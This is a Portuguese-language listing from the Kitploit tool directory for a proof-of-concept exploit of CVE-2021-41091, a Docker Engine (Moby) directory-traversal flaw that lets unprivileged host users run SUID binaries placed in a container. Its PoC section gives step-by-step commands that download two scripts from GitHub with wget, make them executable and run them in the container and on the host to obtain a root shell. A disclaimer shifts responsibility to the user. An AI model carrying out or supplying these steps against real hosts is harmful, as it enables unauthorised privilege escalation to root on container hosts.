Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41091 — Exploit de prova de conceito para CVE-2021-41091: travessia de diretório no Moby (Docker Engine) permitindo que usuários não privilegiados executem binários SUID do container no host. Inclui scripts PoC para Ubuntu 20.04. | Kitploit
Ferramentas/GitHubGitHub/jrbh4ck/cve-2021-41091
Escalada de PrivilégiosSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoEscape de Contêiner
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

Exploit de prova de conceito para CVE-2021-41091: travessia de diretório no Moby (Docker Engine) permitindo que usuários não privilegiados executem binários SUID do container no host. Inclui scripts PoC para Ubuntu 20.04.

Ver Repositório
6há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-41091

Um bug no Moby (Docker Engine) permite a usuários sem privilégios atravessar diretórios e executar programas diretamente do docker na máquina principal, se no docker existir um programa suid, o usuário poderá executá-lo como suid na máquina principal

PoC

No terminal do contêiner baixamos o arquivo docker.sh, em seguida executamos como usuário root:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

Agora na máquina principal baixamos o arquivo principal.sh e executamos:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

Executamos o comando que nos dará o arquivo e seremos capazes de executar o /bin/bash como root

Notas

Estes scripts foram testados no Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) com a versão do Moby 20.10.5+dfsg1

O USO DESTE REPOSITÓRIO É RESPONSABILIDADE DE QUEM O UTILIZA E NÃO DO AUTOR

Baixar ferramenta